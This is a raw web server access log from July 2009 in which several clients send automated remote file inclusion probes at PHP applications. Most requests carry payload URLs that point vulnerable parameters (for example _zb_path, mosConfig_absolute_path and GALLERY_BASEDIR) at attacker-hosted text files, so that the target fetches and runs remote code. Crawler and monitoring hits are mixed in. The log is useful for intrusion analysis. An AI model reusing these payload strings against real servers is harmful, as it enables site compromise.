209.59.12.99 - - [12/Jul/2009:02:10:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.85.63.226 - - [12/Jul/2009:02:12:02 -0400] "GET //?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:02 -0400] "GET /logs/access_log.Q109070200%20%20//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:02 -0400] "GET /logs//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 9195 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:11 -0400] "GET /logs//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 9195 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:11 -0400] "GET /logs/access_log.Q109070200%20%20//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:11 -0400] "GET //?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:23 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:36 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:52 -0400] "GET //?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:52 -0400] "GET /logs/access_log.Q109070200%20%20//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:12:52 -0400] "GET /logs//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 9195 "-" "Mozilla/5.0"
219.85.63.226 - - [12/Jul/2009:02:13:16 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.18.63.194 - - [12/Jul/2009:02:13:46 -0400] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.18.63.194 - - [12/Jul/2009:02:14:05 -0400] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.18.63.194 - - [12/Jul/2009:02:14:08 -0400] "GET /logs/access_log.Q109070200//addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:16:29 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:16:29 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:16:29 -0400] "GET /logs/access_log.Q109063000%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.68.247 - - [12/Jul/2009:02:16:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0193194E982360008831059+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.124.127.34 - - [12/Jul/2009:02:16:39 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:16:39 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:16:39 -0400] "GET /logs/access_log.Q109063000%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
38.99.44.103 - - [12/Jul/2009:02:16:52 -0400] "GET /logs/access_log.Q109062800 HTTP/1.0" 200 2206435 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.105.235 - - [12/Jul/2009:02:18:16 -0400] "GET /logs/error_log.Q109020700 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.205.57.2 - - [12/Jul/2009:02:20:06 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:02:20:08 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:20:24 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:20:24 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:20:24 -0400] "GET /logs/access_log.Q109063000%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:02:20:58 -0400] "GET /logs/error_log.Q107072600 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.124.127.34 - - [12/Jul/2009:02:21:34 -0400] "GET /logs//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:21:34 -0400] "GET /logs/access_log.Q109063000%20%20//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:21:34 -0400] "GET //errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:21:37 -0400] "GET //errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:21:44 -0400] "GET /logs//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:21:44 -0400] "GET /logs/access_log.Q109063000%20%20//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:22:14 -0400] "GET /logs/error_log.Q109063000%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:22:35 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:22:37 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:22:38 -0400] "GET /logs/access_log.Q109063000%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:02:22:49 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:02:22:57 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:23:49 -0400] "GET /logs/error_log.Q109063000%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:24:00 -0400] "GET /logs/access_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.55.105.232 - - [12/Jul/2009:02:24:11 -0400] "GET /logs/error_log.Q107112900 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.147.30.80 - - [12/Jul/2009:02:24:37 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:02:24:37 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:02:24:37 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:02:24:37 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:25:07 -0400] "GET /logs/access_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:30 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:30 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:30 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:31 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:36 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:36 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:36 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:02:26:36 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jul/2009:02:27:02 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 9197 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:27:41 -0400] "GET /logs/access_log.Q109063000//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:02:28:21 -0400] "GET /logs/access_log.Q109063000//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.55.106.209 - - [12/Jul/2009:02:29:05 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.124.127.34 - - [12/Jul/2009:02:29:06 -0400] "GET /logs/error_log.Q109063000//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:29:21 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:29:21 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:29:21 -0400] "GET /logs/access_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:31:15 -0400] "GET /logs/error_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:31:21 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:31:21 -0400] "GET /logs/access_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:31:22 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:32:03 -0400] "GET //errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:32:03 -0400] "GET /logs//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:32:03 -0400] "GET /logs/access_log.Q109063000%20%20//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:32:19 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:32:19 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:32:19 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:32:38 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:32:38 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:32:39 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:33:00 -0400] "GET /logs/error_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:33:12 -0400] "GET //errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:33:12 -0400] "GET /logs//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:33:12 -0400] "GET /logs/access_log.Q109063000%20%20//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:33:27 -0400] "GET /logs/error_log.Q109063000%20%20//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.158.137.122 - - [12/Jul/2009:02:33:35 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; I)"
220.231.126.252 - - [12/Jul/2009:02:33:48 -0400] "GET /logs/access_log.Q109063000//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:33:51 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:33:55 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:34:12 -0400] "GET //errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:34:12 -0400] "GET /logs/access_log.Q109063000//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:34:12 -0400] "GET /logs//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:02:34:15 -0400] "GET /logs/error_log.Q109063000%20%20//errors.php?error=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:02:34:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.106.209 - - [12/Jul/2009:02:35:03 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.223.3.98 - - [12/Jul/2009:02:35:22 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:22 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:29 -0400] "GET /logs/access_log.Q109053000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:35 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:35 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:36 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:47 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:35:47 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:02:35:48 -0400] "GET /logs/error_log.Q109063000//errors.php?error=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:35:57 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:35:57 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:35:59 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:02:35:59 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:36:01 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:36:01 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:36:03 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:36:06 -0400] "GET /logs/access_log.Q109053000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:36:27 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:36:27 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.51.133.202 - - [12/Jul/2009:02:36:27 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:02:36:44 -0400] "GET /images/items/31500023_full.jpg HTTP/1.1" 200 5880 "-" "Googlebot-Image/1.0"
74.200.89.25 - - [12/Jul/2009:02:37:05 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
74.200.89.25 - - [12/Jul/2009:02:37:06 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
74.200.89.25 - - [12/Jul/2009:02:37:06 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
74.200.89.25 - - [12/Jul/2009:02:37:28 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
74.63.91.170 - - [12/Jul/2009:02:37:40 -0400] "GET /index.php?meio=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:37:40 -0400] "GET /logs/index.php?meio=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:37:40 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?meio=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
